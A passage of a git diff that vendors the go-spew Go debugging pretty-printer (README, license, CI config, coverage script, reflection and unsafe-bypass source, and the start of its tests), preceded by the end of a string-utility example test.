+	fmt.Println(SwapCase(in))
+	// Output:
+	// tHIS iS a.tEST
+}
+
+func ExampleInitials() {
+
+	in := "John Doe.Ray"
+	delimiters := []rune{' ', '.'}
+
+	fmt.Println(Initials(in))
+	fmt.Println(Initials(in, delimiters...))
+	// Output:
+	// JD
+	// JDR
+}
diff --git a/vendor/github.com/davecgh/go-spew/.gitignore b/vendor/github.com/davecgh/go-spew/.gitignore
new file mode 100644
index 0000000000..00268614f0
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/.gitignore
@@ -0,0 +1,22 @@
+# Compiled Object files, Static and Dynamic libs (Shared Objects)
+*.o
+*.a
+*.so
+
+# Folders
+_obj
+_test
+
+# Architecture specific extensions/prefixes
+*.[568vq]
+[568vq].out
+
+*.cgo1.go
+*.cgo2.c
+_cgo_defun.c
+_cgo_gotypes.go
+_cgo_export.*
+
+_testmain.go
+
+*.exe
diff --git a/vendor/github.com/davecgh/go-spew/.travis.yml b/vendor/github.com/davecgh/go-spew/.travis.yml
new file mode 100644
index 0000000000..984e0736e7
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/.travis.yml
@@ -0,0 +1,14 @@
+language: go
+go:
+    - 1.5.4
+    - 1.6.3
+    - 1.7
+install:
+    - go get -v golang.org/x/tools/cmd/cover
+script:
+    - go test -v -tags=safe ./spew
+    - go test -v -tags=testcgo ./spew -covermode=count -coverprofile=profile.cov
+after_success:
+    - go get -v github.com/mattn/goveralls
+    - export PATH=$PATH:$HOME/gopath/bin
+    - goveralls -coverprofile=profile.cov -service=travis-ci
diff --git a/vendor/github.com/davecgh/go-spew/LICENSE b/vendor/github.com/davecgh/go-spew/LICENSE
new file mode 100644
index 0000000000..c836416192
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/LICENSE
@@ -0,0 +1,15 @@
+ISC License
+
+Copyright (c) 2012-2016 Dave Collins <dave@davec.name>
+
+Permission to use, copy, modify, and distribute this software for any
+purpose with or without fee is hereby granted, provided that the above
+copyright notice and this permission notice appear in all copies.
+
+THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
diff --git a/vendor/github.com/davecgh/go-spew/README.md b/vendor/github.com/davecgh/go-spew/README.md
new file mode 100644
index 0000000000..262430449b
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/README.md
@@ -0,0 +1,205 @@
+go-spew
+=======
+
+[![Build Status](https://img.shields.io/travis/davecgh/go-spew.svg)]
+(https://travis-ci.org/davecgh/go-spew) [![ISC License]
+(http://img.shields.io/badge/license-ISC-blue.svg)](http://copyfree.org) [![Coverage Status]
+(https://img.shields.io/coveralls/davecgh/go-spew.svg)]
+(https://coveralls.io/r/davecgh/go-spew?branch=master)
+
+
+Go-spew implements a deep pretty printer for Go data structures to aid in
+debugging.  A comprehensive suite of tests with 100% test coverage is provided
+to ensure proper functionality.  See `test_coverage.txt` for the gocov coverage
+report.  Go-spew is licensed under the liberal ISC license, so it may be used in
+open source or commercial projects.
+
+If you're interested in reading about how this package came to life and some
+of the challenges involved in providing a deep pretty printer, there is a blog
+post about it
+[here](https://web.archive.org/web/20160304013555/https://blog.cyphertite.com/go-spew-a-journey-into-dumping-go-data-structures/).
+
+## Documentation
+
+[![GoDoc](https://img.shields.io/badge/godoc-reference-blue.svg)]
+(http://godoc.org/github.com/davecgh/go-spew/spew)
+
+Full `go doc` style documentation for the project can be viewed online without
+installing this package by using the excellent GoDoc site here:
+http://godoc.org/github.com/davecgh/go-spew/spew
+
+You can also view the documentation locally once the package is installed with
+the `godoc` tool by running `godoc -http=":6060"` and pointing your browser to
+http://localhost:6060/pkg/github.com/davecgh/go-spew/spew
+
+## Installation
+
+```bash
+$ go get -u github.com/davecgh/go-spew/spew
+```
+
+## Quick Start
+
+Add this import line to the file you're working in:
+
+```Go
+import "github.com/davecgh/go-spew/spew"
+```
+
+To dump a variable with full newlines, indentation, type, and pointer
+information use Dump, Fdump, or Sdump:
+
+```Go
+spew.Dump(myVar1, myVar2, ...)
+spew.Fdump(someWriter, myVar1, myVar2, ...)
+str := spew.Sdump(myVar1, myVar2, ...)
+```
+
+Alternatively, if you would prefer to use format strings with a compacted inline
+printing style, use the convenience wrappers Printf, Fprintf, etc with %v (most
+compact), %+v (adds pointer addresses), %#v (adds types), or %#+v (adds types
+and pointer addresses): 
+
+```Go
+spew.Printf("myVar1: %v -- myVar2: %+v", myVar1, myVar2)
+spew.Printf("myVar3: %#v -- myVar4: %#+v", myVar3, myVar4)
+spew.Fprintf(someWriter, "myVar1: %v -- myVar2: %+v", myVar1, myVar2)
+spew.Fprintf(someWriter, "myVar3: %#v -- myVar4: %#+v", myVar3, myVar4)
+```
+
+## Debugging a Web Application Example
+
+Here is an example of how you can use `spew.Sdump()` to help debug a web application. Please be sure to wrap your output using the `html.EscapeString()` function for safety reasons. You should also only use this debugging technique in a development environment, never in production.
+
+```Go
+package main
+
+import (
+    "fmt"
+    "html"
+    "net/http"
+
+    "github.com/davecgh/go-spew/spew"
+)
+
+func handler(w http.ResponseWriter, r *http.Request) {
+    w.Header().Set("Content-Type", "text/html")
+    fmt.Fprintf(w, "Hi there, %s!", r.URL.Path[1:])
+    fmt.Fprintf(w, "<!--\n" + html.EscapeString(spew.Sdump(w)) + "\n-->")
+}
+
+func main() {
+    http.HandleFunc("/", handler)
+    http.ListenAndServe(":8080", nil)
+}
+```
+
+## Sample Dump Output
+
+```
+(main.Foo) {
+ unexportedField: (*main.Bar)(0xf84002e210)({
+  flag: (main.Flag) flagTwo,
+  data: (uintptr) <nil>
+ }),
+ ExportedField: (map[interface {}]interface {}) {
+  (string) "one": (bool) true
+ }
+}
+([]uint8) {
+ 00000000  11 12 13 14 15 16 17 18  19 1a 1b 1c 1d 1e 1f 20  |............... |
+ 00000010  21 22 23 24 25 26 27 28  29 2a 2b 2c 2d 2e 2f 30  |!"#$%&'()*+,-./0|
+ 00000020  31 32                                             |12|
+}
+```
+
+## Sample Formatter Output
+
+Double pointer to a uint8:
+```
+	  %v: <**>5
+	 %+v: <**>(0xf8400420d0->0xf8400420c8)5
+	 %#v: (**uint8)5
+	%#+v: (**uint8)(0xf8400420d0->0xf8400420c8)5
+```
+
+Pointer to circular struct with a uint8 field and a pointer to itself:
+```
+	  %v: <*>{1 <*><shown>}
+	 %+v: <*>(0xf84003e260){ui8:1 c:<*>(0xf84003e260)<shown>}
+	 %#v: (*main.circular){ui8:(uint8)1 c:(*main.circular)<shown>}
+	%#+v: (*main.circular)(0xf84003e260){ui8:(uint8)1 c:(*main.circular)(0xf84003e260)<shown>}
+```
+
+## Configuration Options
+
+Configuration of spew is handled by fields in the ConfigState type. For
+convenience, all of the top-level functions use a global state available via the
+spew.Config global.
+
+It is also possible to create a ConfigState instance that provides methods
+equivalent to the top-level functions. This allows concurrent configuration
+options. See the ConfigState documentation for more details.
+
+```
+* Indent
+	String to use for each indentation level for Dump functions.
+	It is a single space by default.  A popular alternative is "\t".
+
+* MaxDepth
+	Maximum number of levels to descend into nested data structures.
+	There is no limit by default.
+
+* DisableMethods
+	Disables invocation of error and Stringer interface methods.
+	Method invocation is enabled by default.
+
+* DisablePointerMethods
+	Disables invocation of error and Stringer interface methods on types
+	which only accept pointer receivers from non-pointer variables.  This option
+	relies on access to the unsafe package, so it will not have any effect when
+	running in environments without access to the unsafe package such as Google
+	App Engine or with the "safe" build tag specified.
+	Pointer method invocation is enabled by default.
+
+* DisablePointerAddresses
+	DisablePointerAddresses specifies whether to disable the printing of
+	pointer addresses. This is useful when diffing data structures in tests.
+
+* DisableCapacities
+	DisableCapacities specifies whether to disable the printing of capacities
+	for arrays, slices, maps and channels. This is useful when diffing data
+	structures in tests.
+
+* ContinueOnMethod
+	Enables recursion into types after invoking error and Stringer interface
+	methods. Recursion after method invocation is disabled by default.
+
+* SortKeys
+	Specifies map keys should be sorted before being printed. Use
+	this to have a more deterministic, diffable output.  Note that
+	only native types (bool, int, uint, floats, uintptr and string)
+	and types which implement error or Stringer interfaces are supported,
+	with other types sorted according to the reflect.Value.String() output
+	which guarantees display stability.  Natural map order is used by
+	default.
+
+* SpewKeys
+	SpewKeys specifies that, as a last resort attempt, map keys should be
+	spewed to strings and sorted by those strings.  This is only considered
+	if SortKeys is true.
+
+```
+
+## Unsafe Package Dependency
+
+This package relies on the unsafe package to perform some of the more advanced
+features, however it also supports a "limited" mode which allows it to work in
+environments where the unsafe package is not available.  By default, it will
+operate in this mode on Google App Engine and when compiled with GopherJS.  The
+"safe" build tag may also be specified to force the package to build without
+using the unsafe package.
+
+## License
+
+Go-spew is licensed under the [copyfree](http://copyfree.org) ISC License.
diff --git a/vendor/github.com/davecgh/go-spew/cov_report.sh b/vendor/github.com/davecgh/go-spew/cov_report.sh
new file mode 100644
index 0000000000..9579497e41
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/cov_report.sh
@@ -0,0 +1,22 @@
+#!/bin/sh
+
+# This script uses gocov to generate a test coverage report.
+# The gocov tool my be obtained with the following command:
+#   go get github.com/axw/gocov/gocov
+#
+# It will be installed to $GOPATH/bin, so ensure that location is in your $PATH.
+
+# Check for gocov.
+if ! type gocov >/dev/null 2>&1; then
+	echo >&2 "This script requires the gocov tool."
+	echo >&2 "You may obtain it with the following command:"
+	echo >&2 "go get github.com/axw/gocov/gocov"
+	exit 1
+fi
+
+# Only run the cgo tests if gcc is installed.
+if type gcc >/dev/null 2>&1; then
+	(cd spew && gocov test -tags testcgo | gocov report)
+else
+	(cd spew && gocov test | gocov report)
+fi
diff --git a/vendor/github.com/davecgh/go-spew/spew/bypass.go b/vendor/github.com/davecgh/go-spew/spew/bypass.go
new file mode 100644
index 0000000000..8a4a6589a2
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/bypass.go
@@ -0,0 +1,152 @@
+// Copyright (c) 2015-2016 Dave Collins <dave@davec.name>
+//
+// Permission to use, copy, modify, and distribute this software for any
+// purpose with or without fee is hereby granted, provided that the above
+// copyright notice and this permission notice appear in all copies.
+//
+// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+// NOTE: Due to the following build constraints, this file will only be compiled
+// when the code is not running on Google App Engine, compiled by GopherJS, and
+// "-tags safe" is not added to the go build command line.  The "disableunsafe"
+// tag is deprecated and thus should not be used.
+// +build !js,!appengine,!safe,!disableunsafe
+
+package spew
+
+import (
+	"reflect"
+	"unsafe"
+)
+
+const (
+	// UnsafeDisabled is a build-time constant which specifies whether or
+	// not access to the unsafe package is available.
+	UnsafeDisabled = false
+
+	// ptrSize is the size of a pointer on the current arch.
+	ptrSize = unsafe.Sizeof((*byte)(nil))
+)
+
+var (
+	// offsetPtr, offsetScalar, and offsetFlag are the offsets for the
+	// internal reflect.Value fields.  These values are valid before golang
+	// commit ecccf07e7f9d which changed the format.  The are also valid
+	// after commit 82f48826c6c7 which changed the format again to mirror
+	// the original format.  Code in the init function updates these offsets
+	// as necessary.
+	offsetPtr    = uintptr(ptrSize)
+	offsetScalar = uintptr(0)
+	offsetFlag   = uintptr(ptrSize * 2)
+
+	// flagKindWidth and flagKindShift indicate various bits that the
+	// reflect package uses internally to track kind information.
+	//
+	// flagRO indicates whether or not the value field of a reflect.Value is
+	// read-only.
+	//
+	// flagIndir indicates whether the value field of a reflect.Value is
+	// the actual data or a pointer to the data.
+	//
+	// These values are valid before golang commit 90a7c3c86944 which
+	// changed their positions.  Code in the init function updates these
+	// flags as necessary.
+	flagKindWidth = uintptr(5)
+	flagKindShift = uintptr(flagKindWidth - 1)
+	flagRO        = uintptr(1 << 0)
+	flagIndir     = uintptr(1 << 1)
+)
+
+func init() {
+	// Older versions of reflect.Value stored small integers directly in the
+	// ptr field (which is named val in the older versions).  Versions
+	// between commits ecccf07e7f9d and 82f48826c6c7 added a new field named
+	// scalar for this purpose which unfortunately came before the flag
+	// field, so the offset of the flag field is different for those
+	// versions.
+	//
+	// This code constructs a new reflect.Value from a known small integer
+	// and checks if the size of the reflect.Value struct indicates it has
+	// the scalar field. When it does, the offsets are updated accordingly.
+	vv := reflect.ValueOf(0xf00)
+	if unsafe.Sizeof(vv) == (ptrSize * 4) {
+		offsetScalar = ptrSize * 2
+		offsetFlag = ptrSize * 3
+	}
+
+	// Commit 90a7c3c86944 changed the flag positions such that the low
+	// order bits are the kind.  This code extracts the kind from the flags
+	// field and ensures it's the correct type.  When it's not, the flag
+	// order has been changed to the newer format, so the flags are updated
+	// accordingly.
+	upf := unsafe.Pointer(uintptr(unsafe.Pointer(&vv)) + offsetFlag)
+	upfv := *(*uintptr)(upf)
+	flagKindMask := uintptr((1<<flagKindWidth - 1) << flagKindShift)
+	if (upfv&flagKindMask)>>flagKindShift != uintptr(reflect.Int) {
+		flagKindShift = 0
+		flagRO = 1 << 5
+		flagIndir = 1 << 6
+
+		// Commit adf9b30e5594 modified the flags to separate the
+		// flagRO flag into two bits which specifies whether or not the
+		// field is embedded.  This causes flagIndir to move over a bit
+		// and means that flagRO is the combination of either of the
+		// original flagRO bit and the new bit.
+		//
+		// This code detects the change by extracting what used to be
+		// the indirect bit to ensure it's set.  When it's not, the flag
+		// order has been changed to the newer format, so the flags are
+		// updated accordingly.
+		if upfv&flagIndir == 0 {
+			flagRO = 3 << 5
+			flagIndir = 1 << 7
+		}
+	}
+}
+
+// unsafeReflectValue converts the passed reflect.Value into a one that bypasses
+// the typical safety restrictions preventing access to unaddressable and
+// unexported data.  It works by digging the raw pointer to the underlying
+// value out of the protected value and generating a new unprotected (unsafe)
+// reflect.Value to it.
+//
+// This allows us to check for implementations of the Stringer and error
+// interfaces to be used for pretty printing ordinarily unaddressable and
+// inaccessible values such as unexported struct fields.
+func unsafeReflectValue(v reflect.Value) (rv reflect.Value) {
+	indirects := 1
+	vt := v.Type()
+	upv := unsafe.Pointer(uintptr(unsafe.Pointer(&v)) + offsetPtr)
+	rvf := *(*uintptr)(unsafe.Pointer(uintptr(unsafe.Pointer(&v)) + offsetFlag))
+	if rvf&flagIndir != 0 {
+		vt = reflect.PtrTo(v.Type())
+		indirects++
+	} else if offsetScalar != 0 {
+		// The value is in the scalar field when it's not one of the
+		// reference types.
+		switch vt.Kind() {
+		case reflect.Uintptr:
+		case reflect.Chan:
+		case reflect.Func:
+		case reflect.Map:
+		case reflect.Ptr:
+		case reflect.UnsafePointer:
+		default:
+			upv = unsafe.Pointer(uintptr(unsafe.Pointer(&v)) +
+				offsetScalar)
+		}
+	}
+
+	pv := reflect.NewAt(vt, upv)
+	rv = pv
+	for i := 0; i < indirects; i++ {
+		rv = rv.Elem()
+	}
+	return rv
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/bypasssafe.go b/vendor/github.com/davecgh/go-spew/spew/bypasssafe.go
new file mode 100644
index 0000000000..1fe3cf3d5d
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/bypasssafe.go
@@ -0,0 +1,38 @@
+// Copyright (c) 2015-2016 Dave Collins <dave@davec.name>
+//
+// Permission to use, copy, modify, and distribute this software for any
+// purpose with or without fee is hereby granted, provided that the above
+// copyright notice and this permission notice appear in all copies.
+//
+// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+// NOTE: Due to the following build constraints, this file will only be compiled
+// when the code is running on Google App Engine, compiled by GopherJS, or
+// "-tags safe" is added to the go build command line.  The "disableunsafe"
+// tag is deprecated and thus should not be used.
+// +build js appengine safe disableunsafe
+
+package spew
+
+import "reflect"
+
+const (
+	// UnsafeDisabled is a build-time constant which specifies whether or
+	// not access to the unsafe package is available.
+	UnsafeDisabled = true
+)
+
+// unsafeReflectValue typically converts the passed reflect.Value into a one
+// that bypasses the typical safety restrictions preventing access to
+// unaddressable and unexported data.  However, doing this relies on access to
+// the unsafe package.  This is a stub version which simply returns the passed
+// reflect.Value when the unsafe package is not available.
+func unsafeReflectValue(v reflect.Value) reflect.Value {
+	return v
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/common.go b/vendor/github.com/davecgh/go-spew/spew/common.go
new file mode 100644
index 0000000000..7c519ff47a
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/common.go
@@ -0,0 +1,341 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins <dave@davec.name>
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+package spew
+
+import (
+	"bytes"
+	"fmt"
+	"io"
+	"reflect"
+	"sort"
+	"strconv"
+)
+
+// Some constants in the form of bytes to avoid string overhead.  This mirrors
+// the technique used in the fmt package.
+var (
+	panicBytes            = []byte("(PANIC=")
+	plusBytes             = []byte("+")
+	iBytes                = []byte("i")
+	trueBytes             = []byte("true")
+	falseBytes            = []byte("false")
+	interfaceBytes        = []byte("(interface {})")
+	commaNewlineBytes     = []byte(",\n")
+	newlineBytes          = []byte("\n")
+	openBraceBytes        = []byte("{")
+	openBraceNewlineBytes = []byte("{\n")
+	closeBraceBytes       = []byte("}")
+	asteriskBytes         = []byte("*")
+	colonBytes            = []byte(":")
+	colonSpaceBytes       = []byte(": ")
+	openParenBytes        = []byte("(")
+	closeParenBytes       = []byte(")")
+	spaceBytes            = []byte(" ")
+	pointerChainBytes     = []byte("->")
+	nilAngleBytes         = []byte("<nil>")
+	maxNewlineBytes       = []byte("<max depth reached>\n")
+	maxShortBytes         = []byte("<max>")
+	circularBytes         = []byte("<already shown>")
+	circularShortBytes    = []byte("<shown>")
+	invalidAngleBytes     = []byte("<invalid>")
+	openBracketBytes      = []byte("[")
+	closeBracketBytes     = []byte("]")
+	percentBytes          = []byte("%")
+	precisionBytes        = []byte(".")
+	openAngleBytes        = []byte("<")
+	closeAngleBytes       = []byte(">")
+	openMapBytes          = []byte("map[")
+	closeMapBytes         = []byte("]")
+	lenEqualsBytes        = []byte("len=")
+	capEqualsBytes        = []byte("cap=")
+)
+
+// hexDigits is used to map a decimal value to a hex digit.
+var hexDigits = "0123456789abcdef"
+
+// catchPanic handles any panics that might occur during the handleMethods
+// calls.
+func catchPanic(w io.Writer, v reflect.Value) {
+	if err := recover(); err != nil {
+		w.Write(panicBytes)
+		fmt.Fprintf(w, "%v", err)
+		w.Write(closeParenBytes)
+	}
+}
+
+// handleMethods attempts to call the Error and String methods on the underlying
+// type the passed reflect.Value represents and outputes the result to Writer w.
+//
+// It handles panics in any called methods by catching and displaying the error
+// as the formatted value.
+func handleMethods(cs *ConfigState, w io.Writer, v reflect.Value) (handled bool) {
+	// We need an interface to check if the type implements the error or
+	// Stringer interface.  However, the reflect package won't give us an
+	// interface on certain things like unexported struct fields in order
+	// to enforce visibility rules.  We use unsafe, when it's available,
+	// to bypass these restrictions since this package does not mutate the
+	// values.
+	if !v.CanInterface() {
+		if UnsafeDisabled {
+			return false
+		}
+
+		v = unsafeReflectValue(v)
+	}
+
+	// Choose whether or not to do error and Stringer interface lookups against
+	// the base type or a pointer to the base type depending on settings.
+	// Technically calling one of these methods with a pointer receiver can
+	// mutate the value, however, types which choose to satisify an error or
+	// Stringer interface with a pointer receiver should not be mutating their
+	// state inside these interface methods.
+	if !cs.DisablePointerMethods && !UnsafeDisabled && !v.CanAddr() {
+		v = unsafeReflectValue(v)
+	}
+	if v.CanAddr() {
+		v = v.Addr()
+	}
+
+	// Is it an error or Stringer?
+	switch iface := v.Interface().(type) {
+	case error:
+		defer catchPanic(w, v)
+		if cs.ContinueOnMethod {
+			w.Write(openParenBytes)
+			w.Write([]byte(iface.Error()))
+			w.Write(closeParenBytes)
+			w.Write(spaceBytes)
+			return false
+		}
+
+		w.Write([]byte(iface.Error()))
+		return true
+
+	case fmt.Stringer:
+		defer catchPanic(w, v)
+		if cs.ContinueOnMethod {
+			w.Write(openParenBytes)
+			w.Write([]byte(iface.String()))
+			w.Write(closeParenBytes)
+			w.Write(spaceBytes)
+			return false
+		}
+		w.Write([]byte(iface.String()))
+		return true
+	}
+	return false
+}
+
+// printBool outputs a boolean value as true or false to Writer w.
+func printBool(w io.Writer, val bool) {
+	if val {
+		w.Write(trueBytes)
+	} else {
+		w.Write(falseBytes)
+	}
+}
+
+// printInt outputs a signed integer value to Writer w.
+func printInt(w io.Writer, val int64, base int) {
+	w.Write([]byte(strconv.FormatInt(val, base)))
+}
+
+// printUint outputs an unsigned integer value to Writer w.
+func printUint(w io.Writer, val uint64, base int) {
+	w.Write([]byte(strconv.FormatUint(val, base)))
+}
+
+// printFloat outputs a floating point value using the specified precision,
+// which is expected to be 32 or 64bit, to Writer w.
+func printFloat(w io.Writer, val float64, precision int) {
+	w.Write([]byte(strconv.FormatFloat(val, 'g', -1, precision)))
+}
+
+// printComplex outputs a complex value using the specified float precision
+// for the real and imaginary parts to Writer w.
+func printComplex(w io.Writer, c complex128, floatPrecision int) {
+	r := real(c)
+	w.Write(openParenBytes)
+	w.Write([]byte(strconv.FormatFloat(r, 'g', -1, floatPrecision)))
+	i := imag(c)
+	if i >= 0 {
+		w.Write(plusBytes)
+	}
+	w.Write([]byte(strconv.FormatFloat(i, 'g', -1, floatPrecision)))
+	w.Write(iBytes)
+	w.Write(closeParenBytes)
+}
+
+// printHexPtr outputs a uintptr formatted as hexidecimal with a leading '0x'
+// prefix to Writer w.
+func printHexPtr(w io.Writer, p uintptr) {
+	// Null pointer.
+	num := uint64(p)
+	if num == 0 {
+		w.Write(nilAngleBytes)
+		return
+	}
+
+	// Max uint64 is 16 bytes in hex + 2 bytes for '0x' prefix
+	buf := make([]byte, 18)
+
+	// It's simpler to construct the hex string right to left.
+	base := uint64(16)
+	i := len(buf) - 1
+	for num >= base {
+		buf[i] = hexDigits[num%base]
+		num /= base
+		i--
+	}
+	buf[i] = hexDigits[num]
+
+	// Add '0x' prefix.
+	i--
+	buf[i] = 'x'
+	i--
+	buf[i] = '0'
+
+	// Strip unused leading bytes.
+	buf = buf[i:]
+	w.Write(buf)
+}
+
+// valuesSorter implements sort.Interface to allow a slice of reflect.Value
+// elements to be sorted.
+type valuesSorter struct {
+	values  []reflect.Value
+	strings []string // either nil or same len and values
+	cs      *ConfigState
+}
+
+// newValuesSorter initializes a valuesSorter instance, which holds a set of
+// surrogate keys on which the data should be sorted.  It uses flags in
+// ConfigState to decide if and how to populate those surrogate keys.
+func newValuesSorter(values []reflect.Value, cs *ConfigState) sort.Interface {
+	vs := &valuesSorter{values: values, cs: cs}
+	if canSortSimply(vs.values[0].Kind()) {
+		return vs
+	}
+	if !cs.DisableMethods {
+		vs.strings = make([]string, len(values))
+		for i := range vs.values {
+			b := bytes.Buffer{}
+			if !handleMethods(cs, &b, vs.values[i]) {
+				vs.strings = nil
+				break
+			}
+			vs.strings[i] = b.String()
+		}
+	}
+	if vs.strings == nil && cs.SpewKeys {
+		vs.strings = make([]string, len(values))
+		for i := range vs.values {
+			vs.strings[i] = Sprintf("%#v", vs.values[i].Interface())
+		}
+	}
+	return vs
+}
+
+// canSortSimply tests whether a reflect.Kind is a primitive that can be sorted
+// directly, or whether it should be considered for sorting by surrogate keys
+// (if the ConfigState allows it).
+func canSortSimply(kind reflect.Kind) bool {
+	// This switch parallels valueSortLess, except for the default case.
+	switch kind {
+	case reflect.Bool:
+		return true
+	case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int:
+		return true
+	case reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uint:
+		return true
+	case reflect.Float32, reflect.Float64:
+		return true
+	case reflect.String:
+		return true
+	case reflect.Uintptr:
+		return true
+	case reflect.Array:
+		return true
+	}
+	return false
+}
+
+// Len returns the number of values in the slice.  It is part of the
+// sort.Interface implementation.
+func (s *valuesSorter) Len() int {
+	return len(s.values)
+}
+
+// Swap swaps the values at the passed indices.  It is part of the
+// sort.Interface implementation.
+func (s *valuesSorter) Swap(i, j int) {
+	s.values[i], s.values[j] = s.values[j], s.values[i]
+	if s.strings != nil {
+		s.strings[i], s.strings[j] = s.strings[j], s.strings[i]
+	}
+}
+
+// valueSortLess returns whether the first value should sort before the second
+// value.  It is used by valueSorter.Less as part of the sort.Interface
+// implementation.
+func valueSortLess(a, b reflect.Value) bool {
+	switch a.Kind() {
+	case reflect.Bool:
+		return !a.Bool() && b.Bool()
+	case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int:
+		return a.Int() < b.Int()
+	case reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uint:
+		return a.Uint() < b.Uint()
+	case reflect.Float32, reflect.Float64:
+		return a.Float() < b.Float()
+	case reflect.String:
+		return a.String() < b.String()
+	case reflect.Uintptr:
+		return a.Uint() < b.Uint()
+	case reflect.Array:
+		// Compare the contents of both arrays.
+		l := a.Len()
+		for i := 0; i < l; i++ {
+			av := a.Index(i)
+			bv := b.Index(i)
+			if av.Interface() == bv.Interface() {
+				continue
+			}
+			return valueSortLess(av, bv)
+		}
+	}
+	return a.String() < b.String()
+}
+
+// Less returns whether the value at index i should sort before the
+// value at index j.  It is part of the sort.Interface implementation.
+func (s *valuesSorter) Less(i, j int) bool {
+	if s.strings == nil {
+		return valueSortLess(s.values[i], s.values[j])
+	}
+	return s.strings[i] < s.strings[j]
+}
+
+// sortValues is a sort function that handles both native types and any type that
+// can be converted to error or Stringer.  Other inputs are sorted according to
+// their Value.String() value to ensure display stability.
+func sortValues(values []reflect.Value, cs *ConfigState) {
+	if len(values) == 0 {
+		return
+	}
+	sort.Sort(newValuesSorter(values, cs))
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/common_test.go b/vendor/github.com/davecgh/go-spew/spew/common_test.go
new file mode 100644
index 0000000000..0f5ce47dca
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/common_test.go
@@ -0,0 +1,298 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins <dave@davec.name>
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+package spew_test
+
+import (
+	"fmt"
+	"reflect"
+	"testing"
+
+	"github.com/davecgh/go-spew/spew"
+)
+
+// custom type to test Stinger interface on non-pointer receiver.
+type stringer string
+
+// String implements the Stringer interface for testing invocation of custom
+// stringers on types with non-pointer receivers.
+func (s stringer) String() string {
+	return "stringer " + string(s)
+}
+
+// custom type to test Stinger interface on pointer receiver.
+type pstringer string
+
+// String implements the Stringer interface for testing invocation of custom
+// stringers on types with only pointer receivers.
